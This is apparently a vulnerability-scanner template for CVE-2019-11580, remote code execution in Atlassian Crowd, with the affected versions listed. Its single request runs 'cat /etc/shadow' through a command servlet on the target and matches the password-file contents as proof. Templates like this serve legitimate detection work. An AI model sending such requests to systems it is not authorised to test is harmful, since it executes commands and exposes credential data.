id: CVE-2019-11580 info: name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE author: dwisiswant0 severity: critical # Atlassian Crowd and Crowd Data Center # had the pdkinstall development plugin incorrectly enabled in release builds. # Attackers who can send unauthenticated or authenticated requests # to a Crowd or Crowd Data Center instance can exploit this vulnerability # to install arbitrary plugins, which permits remote code execution on # systems running a vulnerable version of Crowd or Crowd Data Center. # All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), # from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), # from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), # from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), # and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. # - # References: # > https://github.com/jas502n/CVE-2019-11580 requests: - method: GET path: - "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow" matchers-condition: and matchers: - type: word words: - "root:*:" - "bin:*:" condition: and part: body - type: status status: - 200